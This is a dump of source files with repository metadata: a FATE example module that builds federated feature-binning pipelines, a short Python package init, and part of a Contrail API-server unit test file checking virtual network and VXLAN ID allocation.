2019-01-24T10:52:03.000Z
|
2019-10-31T12:19:22.000Z
|
examples/pipeline/hetero_feature_binning/common_tools.py
|
rubenlozanoaht3m/DataDogm
|
cd605e8072cca31e8418830c3300657ae2fa5b16
|
[
"Apache-2.0"
] | 270
|
2019-02-11T02:57:36.000Z
|
2019-08-29T11:22:33.000Z
|
examples/pipeline/hetero_feature_binning/common_tools.py
|
rubenlozanoaht3m/DataDogm
|
cd605e8072cca31e8418830c3300657ae2fa5b16
|
[
"Apache-2.0"
] | 200
|
2019-01-26T14:21:35.000Z
|
2019-11-01T01:14:36.000Z
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from pipeline.backend.pipeline import PipeLine
from pipeline.component import DataTransform
from pipeline.component import HeteroFeatureBinning
from pipeline.component import Intersection
from pipeline.component import OneHotEncoder
from pipeline.component import Reader
from pipeline.interface import Data
from pipeline.interface import Model
def prettify(response, verbose=True):
if verbose:
print(json.dumps(response, indent=4, ensure_ascii=False))
print()
return response
def make_add_one_hot_dsl(config, namespace, bin_param, is_multi_host=False):
parties = config.parties
guest = parties.guest[0]
hosts = parties.host
guest_train_data = {"name": "breast_hetero_guest", "namespace": f"experiment{namespace}"}
host_train_data = {"name": "breast_hetero_host", "namespace": f"experiment{namespace}"}
guest_eval_data = {"name": "breast_hetero_guest", "namespace": f"experiment{namespace}"}
host_eval_data = {"name": "breast_hetero_host", "namespace": f"experiment{namespace}"}
# initialize pipeline
pipeline = PipeLine()
# set job initiator
pipeline.set_initiator(role='guest', party_id=guest)
# set participants information
if is_multi_host:
pipeline.set_roles(guest=guest, host=hosts)
else:
pipeline.set_roles(guest=guest, host=hosts[0])
# define Reader components to read in data
reader_0 = Reader(name="reader_0")
# configure Reader for guest
reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
# configure Reader for host
reader_0.get_party_instance(role='host', party_id=hosts[0]).component_param(table=host_train_data)
if is_multi_host:
reader_0.get_party_instance(role='host', party_id=hosts[1]).component_param(table=host_train_data)
reader_1 = Reader(name="reader_1")
reader_1.get_party_instance(role='guest', party_id=guest).component_param(table=guest_eval_data)
reader_1.get_party_instance(role='host', party_id=hosts[0]).component_param(table=host_eval_data)
if is_multi_host:
reader_1.get_party_instance(role='host', party_id=hosts[1]).component_param(table=host_eval_data)
# define DataTransform components
data_transform_0 = DataTransform(name="data_transform_0") # start component numbering at 0
data_transform_1 = DataTransform(name="data_transform_1")
# get DataTransform party instance of guest
data_transform_0_guest_party_instance = data_transform_0.get_party_instance(role='guest', party_id=guest)
# configure DataTransform for guest
data_transform_0_guest_party_instance.component_param(with_label=True, output_format="dense")
# get and configure DataTransform party instance of host
data_transform_0.get_party_instance(role='host', party_id=hosts[0]).component_param(with_label=False)
if is_multi_host:
data_transform_0.get_party_instance(role='host', party_id=hosts[1]).component_param(with_label=False)
# define Intersection components
intersection_0 = Intersection(name="intersection_0")
intersection_1 = Intersection(name="intersection_1")
hetero_feature_binning_0 = HeteroFeatureBinning(**bin_param)
hetero_feature_binning_1 = HeteroFeatureBinning(name='hetero_feature_binning_1')
one_hot_encoder_0 = OneHotEncoder(name='one_hot_encoder_0',
transform_col_indexes=-1,
transform_col_names=None,
need_run=True)
# add components to pipeline, in order of task execution
pipeline.add_component(reader_0)
pipeline.add_component(reader_1)
pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))
# set data_transform_1 to replicate model from data_transform_0
pipeline.add_component(
data_transform_1, data=Data(
data=reader_1.output.data), model=Model(
data_transform_0.output.model))
# set data input sources of intersection components
pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))
pipeline.add_component(intersection_1, data=Data(data=data_transform_1.output.data))
# set train & validate data of hetero_lr_0 component
pipeline.add_component(hetero_feature_binning_0, data=Data(data=intersection_0.output.data))
pipeline.add_component(hetero_feature_binning_1, data=Data(data=intersection_1.output.data),
model=Model(hetero_feature_binning_0.output.model))
pipeline.add_component(one_hot_encoder_0, data=Data(data=hetero_feature_binning_0.output.data))
# compile pipeline once finished adding modules, this step will form conf and dsl files for running job
pipeline.compile()
# pipeline.fit(work_mode=work_mode)
return pipeline
def make_normal_dsl(config, namespace, bin_param, dataset='breast', is_multi_host=False,
host_dense_output=True):
parties = config.parties
guest = parties.guest[0]
hosts = parties.host
if dataset == 'breast':
guest_table_name = 'breast_hetero_guest'
host_table_name = 'breast_hetero_host'
elif dataset == 'default_credit':
guest_table_name = 'default_credit_hetero_guest'
host_table_name = 'default_credit_hetero_host'
else:
raise ValueError(f"dataset: {dataset} cannot be recognized")
guest_train_data = {"name": guest_table_name, "namespace": f"experiment{namespace}"}
host_train_data = {"name": host_table_name, "namespace": f"experiment{namespace}"}
# initialize pipeline
pipeline = PipeLine()
# set job initiator
pipeline.set_initiator(role='guest', party_id=guest)
# set participants information
if is_multi_host:
pipeline.set_roles(guest=guest, host=hosts)
else:
pipeline.set_roles(guest=guest, host=hosts[0])
# define Reader components to read in data
reader_0 = Reader(name="reader_0")
# configure Reader for guest
reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
# configure Reader for host
reader_0.get_party_instance(role='host', party_id=hosts[0]).component_param(table=host_train_data)
if is_multi_host:
reader_0.get_party_instance(role='host', party_id=hosts[1]).component_param(table=host_train_data)
# define DataTransform components
data_transform_0 = DataTransform(name="data_transform_0") # start component numbering at 0
# get DataTransform party instance of guest
data_transform_0_guest_party_instance = data_transform_0.get_party_instance(role='guest', party_id=guest)
# configure DataTransform for guest
data_transform_0_guest_party_instance.component_param(with_label=True, output_format="dense")
# get and configure DataTransform party instance of host
if host_dense_output:
output_format = 'dense'
else:
output_format = 'sparse'
if is_multi_host:
data_transform_0.get_party_instance(role='host', party_id=hosts). \
component_param(with_label=False,
output_format=output_format)
else:
data_transform_0.get_party_instance(role='host', party_id=hosts[0]). \
component_param(with_label=False,
output_format=output_format)
# define Intersection components
intersection_0 = Intersection(name="intersection_0")
hetero_feature_binning_0 = HeteroFeatureBinning(**bin_param)
# add components to pipeline, in order of task execution
pipeline.add_component(reader_0)
pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))
# set data input sources of intersection components
pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))
# set train & validate data of hetero_lr_0 component
pipeline.add_component(hetero_feature_binning_0, data=Data(data=intersection_0.output.data))
# compile pipeline once finished adding modules, this step will form conf and dsl files for running job
pipeline.compile()
# fit model
# pipeline.fit(work_mode=work_mode)
return pipeline
def make_asymmetric_dsl(config, namespace, guest_param, host_param, dataset='breast', is_multi_host=False,
host_dense_output=True):
parties = config.parties
guest = parties.guest[0]
hosts = parties.host
if dataset == 'breast':
guest_table_name = 'breast_hetero_guest'
host_table_name = 'breast_hetero_host'
elif dataset == 'default_credit':
guest_table_name = 'default_credit_hetero_guest'
host_table_name = 'default_credit_hetero_host'
else:
raise ValueError(f"dataset: {dataset} cannot be recognized")
guest_train_data = {"name": guest_table_name, "namespace": f"experiment{namespace}"}
host_train_data = {"name": host_table_name, "namespace": f"experiment{namespace}"}
# initialize pipeline
pipeline = PipeLine()
# set job initiator
pipeline.set_initiator(role='guest', party_id=guest)
# set participants information
if is_multi_host:
pipeline.set_roles(guest=guest, host=hosts)
else:
pipeline.set_roles(guest=guest, host=hosts[0])
# define Reader components to read in data
reader_0 = Reader(name="reader_0")
# configure Reader for guest
reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
# configure Reader for host
reader_0.get_party_instance(role='host', party_id=hosts[0]).component_param(table=host_train_data)
if is_multi_host:
reader_0.get_party_instance(role='host', party_id=hosts[1]).component_param(table=host_train_data)
# define DataTransform components
data_transform_0 = DataTransform(name="data_transform_0") # start component numbering at 0
# get DataTransform party instance of guest
data_transform_0_guest_party_instance = data_transform_0.get_party_instance(role='guest', party_id=guest)
# configure DataTransform for guest
data_transform_0_guest_party_instance.component_param(with_label=True, output_format="dense")
# get and configure DataTransform party instance of host
if host_dense_output:
output_format = 'dense'
else:
output_format = 'sparse'
if is_multi_host:
data_transform_0.get_party_instance(role='host', party_id=hosts). \
component_param(with_label=False,
output_format=output_format)
else:
data_transform_0.get_party_instance(role='host', party_id=hosts[0]). \
component_param(with_label=False,
output_format=output_format)
# define Intersection components
intersection_0 = Intersection(name="intersection_0")
hetero_feature_binning_0 = HeteroFeatureBinning(name="hetero_feature_binning_0")
hetero_feature_binning_0.get_party_instance(role='guest', party_id=guest).component_param(**guest_param)
if is_multi_host:
hetero_feature_binning_0.get_party_instance(role='host', party_id=hosts).component_param(**host_param)
else:
hetero_feature_binning_0.get_party_instance(role='host', party_id=hosts[0]).component_param(**host_param)
# add components to pipeline, in order of task execution
pipeline.add_component(reader_0)
pipeline.add_component(data_transform_0, data=Data(data=reader_0.output.data))
# set data input sources of intersection components
pipeline.add_component(intersection_0, data=Data(data=data_transform_0.output.data))
# set train & validate data of hetero_lr_0 component
pipeline.add_component(hetero_feature_binning_0, data=Data(data=intersection_0.output.data))
# compile pipeline once finished adding modules, this step will form conf and dsl files for running job
pipeline.compile()
# fit model
# pipeline.fit(work_mode=work_mode)
return pipeline
| 44.85461
| 113
| 0.737212
| 1,688
| 12,649
| 5.229265
| 0.109005
| 0.053019
| 0.045995
| 0.054379
| 0.838224
| 0.809108
| 0.794834
| 0.788943
| 0.786111
| 0.769457
| 0
| 0.012565
| 0.175745
| 12,649
| 281
| 114
| 45.014235
| 0.834069
| 0.213456
| 0
| 0.725146
| 0
| 0
| 0.10416
| 0.032594
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023392
| false
| 0
| 0.052632
| 0
| 0.099415
| 0.011696
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a011bb2de9128e2e0f9dc2988ccaf1752f8e3f4
| 113
|
py
|
Python
|
core/__init__.py
|
dokzlo13/c.nord_task
|
08428f093329d72ae2e9a79223b0d6a9e9bb78c3
|
[
"Unlicense"
] | null | null | null |
core/__init__.py
|
dokzlo13/c.nord_task
|
08428f093329d72ae2e9a79223b0d6a9e9bb78c3
|
[
"Unlicense"
] | null | null | null |
core/__init__.py
|
dokzlo13/c.nord_task
|
08428f093329d72ae2e9a79223b0d6a9e9bb78c3
|
[
"Unlicense"
] | null | null | null |
from core import marshalling
from core import utils
from core import types
from core.supervisor import Supervisor
| 28.25
| 38
| 0.858407
| 17
| 113
| 5.705882
| 0.411765
| 0.329897
| 0.43299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132743
| 113
| 4
| 38
| 28.25
| 0.989796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a106da63e94a1c05fe02c1706ad6d2c80454274
| 31,448
|
py
|
Python
|
src/config/api-server/vnc_cfg_api_server/tests/resources/test_virtual_network.py
|
atsgen/tf-controller
|
9321889cdd3d7108980cc88937b2e82956502cc5
|
[
"Apache-2.0"
] | null | null | null |
src/config/api-server/vnc_cfg_api_server/tests/resources/test_virtual_network.py
|
atsgen/tf-controller
|
9321889cdd3d7108980cc88937b2e82956502cc5
|
[
"Apache-2.0"
] | null | null | null |
src/config/api-server/vnc_cfg_api_server/tests/resources/test_virtual_network.py
|
atsgen/tf-controller
|
9321889cdd3d7108980cc88937b2e82956502cc5
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2017 Juniper Networks, Inc. All rights reserved.
#
import logging
from cfgm_common import get_bgp_rtgt_min_id
from cfgm_common import VNID_MIN_ALLOC
from cfgm_common.exceptions import BadRequest
from cfgm_common.exceptions import HttpError
from cfgm_common.exceptions import PermissionDenied
from cfgm_common.exceptions import RefsExistError
from cfgm_common.tests import test_common
from testtools import ExpectedException
from vnc_api.vnc_api import GlobalSystemConfig
from vnc_api.vnc_api import Project
from vnc_api.vnc_api import ProviderDetails
from vnc_api.vnc_api import RouteTargetList
from vnc_api.vnc_api import VirtualMachineInterface
from vnc_api.vnc_api import VirtualNetwork
from vnc_api.vnc_api import VirtualNetworkType
from vnc_cfg_api_server.tests import test_case
logger = logging.getLogger(__name__)
class TestVirtualNetwork(test_case.ApiServerTestCase):
@classmethod
def setUpClass(cls, *args, **kwargs):
cls.console_handler = logging.StreamHandler()
cls.console_handler.setLevel(logging.DEBUG)
logger.addHandler(cls.console_handler)
super(TestVirtualNetwork, cls).setUpClass(*args, **kwargs)
@classmethod
def tearDownClass(cls, *args, **kwargs):
logger.removeHandler(cls.console_handler)
super(TestVirtualNetwork, cls).tearDownClass(*args, **kwargs)
@property
def api(self):
return self._vnc_lib
def test_allocate_vn_id(self):
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn_obj)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_id = vn_obj.virtual_network_network_id
self.assertEqual(vn_obj.get_fq_name_str(),
mock_zk.get_vn_from_id(vn_id))
self.assertGreaterEqual(vn_id, VNID_MIN_ALLOC)
def test_deallocate_vn_id(self):
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn_obj)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_id = vn_obj.virtual_network_network_id
self.api.virtual_network_delete(id=vn_obj.uuid)
self.assertNotEqual(mock_zk.get_vn_from_id(vn_id),
vn_obj.get_fq_name_str())
def test_not_deallocate_vn_id_if_fq_name_does_not_correspond(self):
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn_obj)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_id = vn_obj.virtual_network_network_id
fake_fq_name = "fake fq_name"
mock_zk._vn_id_allocator.delete(vn_id - VNID_MIN_ALLOC)
mock_zk._vn_id_allocator.reserve(vn_id - VNID_MIN_ALLOC, fake_fq_name)
self.api.virtual_network_delete(id=vn_obj.uuid)
self.assertIsNotNone(mock_zk.get_vn_from_id(vn_id))
self.assertEqual(fake_fq_name, mock_zk.get_vn_from_id(vn_id))
def test_cannot_set_vn_id(self):
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj.set_virtual_network_network_id(42)
with ExpectedException(PermissionDenied):
self.api.virtual_network_create(vn_obj)
def test_cannot_update_vn_id(self):
vn_obj = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn_obj)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj.set_virtual_network_network_id(42)
with ExpectedException(PermissionDenied):
self.api.virtual_network_update(vn_obj)
# test can update with same value, needed internally
# TODO(ethuleau): not sure why it's needed
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj.set_virtual_network_network_id(
vn_obj.virtual_network_network_id)
self.api.virtual_network_update(vn_obj)
def test_create_vn_with_configured_rt_in_system_range(self):
gsc = self.api.global_system_config_read(GlobalSystemConfig().fq_name)
vn = VirtualNetwork('%s-vn' % self.id())
rt_name = 'target:%d:%d' % (gsc.autonomous_system,
get_bgp_rtgt_min_id(
gsc.autonomous_system) + 1000)
vn.set_route_target_list(RouteTargetList([rt_name]))
self.assertRaises(BadRequest, self.api.virtual_network_create, vn)
def test_update_vn_with_configured_rt_in_system_range(self):
gsc = self.api.global_system_config_read(GlobalSystemConfig().fq_name)
vn = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn)
rt_name = 'target:%d:%d' % (gsc.autonomous_system,
get_bgp_rtgt_min_id(
gsc.autonomous_system) + 1000)
vn.set_route_target_list(RouteTargetList([rt_name]))
self.assertRaises(BadRequest, self.api.virtual_network_update, vn)
def test_allocate_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(6000)
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_create(vn_obj)
# VN created, now read back the VN data to check if vxlan_id is set
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj_properties = vn_obj.get_virtual_network_properties()
if not vn_obj_properties:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6000)
self.assertEqual(vn_obj.get_fq_name_str() + "_vxlan",
mock_zk.get_vn_from_id(vxlan_id))
self.assertGreaterEqual(vxlan_id, VNID_MIN_ALLOC)
self.api.virtual_network_delete(id=vn_obj.uuid)
logger.debug('PASS - test_allocate_vxlan_id')
def test_cannot_allocate_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn1_obj = VirtualNetwork('%s-vn' % self.id())
vn1_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn1_obj_properties.set_vxlan_network_identifier(6001)
vn1_obj_properties.set_forwarding_mode('l2_l3')
vn1_obj.set_virtual_network_properties(vn1_obj_properties)
self.api.virtual_network_create(vn1_obj)
# VN created, now read back the VN data to check if vxlan_id is set
vn1_obj = self.api.virtual_network_read(id=vn1_obj.uuid)
vn1_obj_properties = vn1_obj.get_virtual_network_properties()
if not vn1_obj_properties:
self.fail("VN properties are not set")
vxlan_id = vn1_obj_properties.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6001)
# Verified vxlan_id for VN1, now create VN2 with same vxlan_id
vn2_obj = VirtualNetwork('%s-vn2' % self.id())
vn2_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn2_obj_properties.set_vxlan_network_identifier(6001)
vn2_obj_properties.set_forwarding_mode('l2_l3')
vn2_obj.set_virtual_network_properties(vn2_obj_properties)
with ExpectedException(BadRequest):
self.api.virtual_network_create(vn2_obj)
self.assertEqual(vn1_obj.get_fq_name_str() + "_vxlan",
mock_zk.get_vn_from_id(vxlan_id))
self.assertGreaterEqual(vxlan_id, VNID_MIN_ALLOC)
self.api.virtual_network_delete(id=vn1_obj.uuid)
logger.debug('PASS - test_cannot_allocate_vxlan_id')
def test_deallocate_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(6002)
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_create(vn_obj)
# VN created, now read back the VN data to check if vxlan_id is set
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj_properties = vn_obj.get_virtual_network_properties()
if not vn_obj_properties:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6002)
self.api.virtual_network_delete(id=vn_obj.uuid)
self.assertNotEqual(vn_obj.get_fq_name_str() + "_vxlan",
mock_zk.get_vn_from_id(vxlan_id))
logger.debug('PASS - test_deallocate_vxlan_id')
def test_update_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(6003)
vn_obj_properties.set_forwarding_mode('l2_l3')
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_create(vn_obj)
# VN created, now read back the VN data to check if vxlan_id is set
vn_obj_read = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj_properties_read = vn_obj_read.get_virtual_network_properties()
if not vn_obj_properties_read:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties_read.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6003)
# Created VN. Now Update it with a different vxlan_id
vn_obj_properties.set_vxlan_network_identifier(6004)
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_update(vn_obj)
vn_obj_read = self.api.virtual_network_read(id=vn_obj.uuid)
vn_obj_properties_read = vn_obj_read.get_virtual_network_properties()
if not vn_obj_properties_read:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties_read.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6004)
self.api.virtual_network_delete(id=vn_obj.uuid)
logger.debug('PASS - test_update_vxlan_id')
def test_cannot_update_vxlan_id(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
vn1_obj = VirtualNetwork('%s-vn1' % self.id())
vn1_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn1_obj_properties.set_vxlan_network_identifier(6005)
vn1_obj_properties.set_forwarding_mode('l2_l3')
vn1_obj.set_virtual_network_properties(vn1_obj_properties)
self.api.virtual_network_create(vn1_obj)
# VN created, create second VN with different vxlan_id
vn2_obj = VirtualNetwork('%s-vn2' % self.id())
vn2_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn2_obj_properties.set_vxlan_network_identifier(6006)
vn2_obj_properties.set_forwarding_mode('l2_l3')
vn2_obj.set_virtual_network_properties(vn2_obj_properties)
self.api.virtual_network_create(vn2_obj)
# Created Two VNs. Now Update it second VN with 1st VNs VXLAN_ID
vn2_obj_properties.set_vxlan_network_identifier(6005)
vn2_obj.set_virtual_network_properties(vn2_obj_properties)
with ExpectedException(BadRequest):
self.api.virtual_network_update(vn2_obj)
vn_obj_read = self.api.virtual_network_read(id=vn2_obj.uuid)
vn_obj_properties_read = vn_obj_read.get_virtual_network_properties()
if not vn_obj_properties_read:
self.fail("VN properties are not set")
vxlan_id = vn_obj_properties_read.get_vxlan_network_identifier()
self.assertEqual(vxlan_id, 6006)
self.api.virtual_network_delete(id=vn2_obj.uuid)
self.api.virtual_network_delete(id=vn1_obj.uuid)
logger.debug('PASS - test_cannot_update_vxlan_id')
def test_update_auto_vxlan_id_with_the_same_value(self):
"""
Test case.
1. Set VxLAN identifier mode to 'automatic'.
2. Create new VirtualNetwork.
3. Set VxLAN identifier mode to 'configured'.
4. Update VirtualNetwork with vxlan network identifier equal to
network id.
"""
gvc_fq_name = ['default-global-system-config',
'default-global-vrouter-config']
vxlan_id_mode = {'auto': 'automatic', 'user': 'configured'}
# Set VxLAN identifier mode to 'automatic'
gvc = self.api.global_vrouter_config_read(fq_name=gvc_fq_name)
gvc.set_vxlan_network_identifier_mode(vxlan_id_mode['auto'])
self.api.global_vrouter_config_update(gvc)
gvc = self.api.global_vrouter_config_read(fq_name=gvc_fq_name)
# verify vxlan id mode has been set
self.assertEqual(gvc.vxlan_network_identifier_mode,
vxlan_id_mode['auto'])
# Create new VirtualNetwork
vn = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn)
vn = self.api.virtual_network_read(fq_name=vn.fq_name)
# verify vn_network_id has been set
vn_network_id = vn.get_virtual_network_network_id()
self.assertTrue(vn_network_id > 0)
# Set VxLAN identifier mode to 'configured' (user defined)
gvc.set_vxlan_network_identifier_mode(vxlan_id_mode['user'])
self.api.global_vrouter_config_update(gvc)
gvc = self.api.global_vrouter_config_read(fq_name=gvc_fq_name)
# verify vxlan id mode has been set
self.assertEqual(gvc.vxlan_network_identifier_mode,
vxlan_id_mode['user'])
# Update VirtualNetwork with vxlan network identifier
# equal to network id
vn_properties = VirtualNetworkType()
vn_properties.set_vxlan_network_identifier(vn_network_id)
vn.set_virtual_network_properties(vn_properties)
self.api.virtual_network_update(vn)
# verify vn_network_id is the same as vxlan_network_id
vn = self.api.virtual_network_read(fq_name=vn.fq_name)
vxlan_id = vn.get_virtual_network_properties() \
.get_vxlan_network_identifier()
self.assertEqual(vn_network_id, vxlan_id)
def test_context_undo_fail_db_create(self):
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_create', stub)]):
self.api.virtual_network_create(vn_obj)
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_context_undo_vxlan_id_fail_db_create(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(6000)
vn_obj.set_virtual_network_properties(vn_obj_properties)
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_create', stub)]):
self.api.virtual_network_create(vn_obj)
# make sure allocation counter stays the same
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_context_undo_fail_db_delete(self):
vn_obj = self.create_virtual_network('vn-l2-%s' % self.id())
vn_ipam_refs = vn_obj.get_network_ipam_refs()
mock_zk = self._api_server._db_conn._zk_db
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_delete', stub)]):
self.api.virtual_network_delete(id=vn_obj.uuid)
# Make sure ipam refs still present (undo action recreated it)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_ipam_refs_after_delete_fail = vn_obj.get_network_ipam_refs()
self.assertEqual(vn_ipam_refs[0]['to'],
vn_ipam_refs_after_delete_fail[0]['to'])
self.assertEqual(vn_ipam_refs[0]['uuid'],
vn_ipam_refs_after_delete_fail[0]['uuid'])
self.assertEqual(vn_ipam_refs[0]['attr'].ipam_subnets[0].subnet_uuid,
vn_ipam_refs_after_delete_fail[0][
'attr'].ipam_subnets[0].subnet_uuid)
# Make sure allocation counter stays the same
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_context_undo_vxlan_id_fail_db_update(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
# Create vxlan
vxlan_id = 6000
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(vxlan_id)
vn_obj_properties.set_forwarding_mode('l2_l3')
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_create(vn_obj)
vxlan_fqname = mock_zk.get_vn_from_id(vxlan_id)
# Update vxlan id (will fail)
new_vxlan_id = 6005
vn_obj_properties.set_vxlan_network_identifier(new_vxlan_id)
vn_obj.set_virtual_network_properties(vn_obj_properties)
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_update', stub)]):
self.api.virtual_network_update(vn_obj)
# Make sure vxlan_id is still allocated with same name
new_vxlan_fqname = mock_zk.get_vn_from_id(vxlan_id)
self.assertEqual(new_vxlan_fqname, vxlan_fqname)
# Make sure new_vxlan_id is deallocated
update_vxlan_fqname = mock_zk.get_vn_from_id(new_vxlan_id)
self.assertEqual(update_vxlan_fqname, None)
# Make sure allocation counter stays the same
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_context_undo_vn_to_vxlan_id_fail_db_update(self):
# Enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
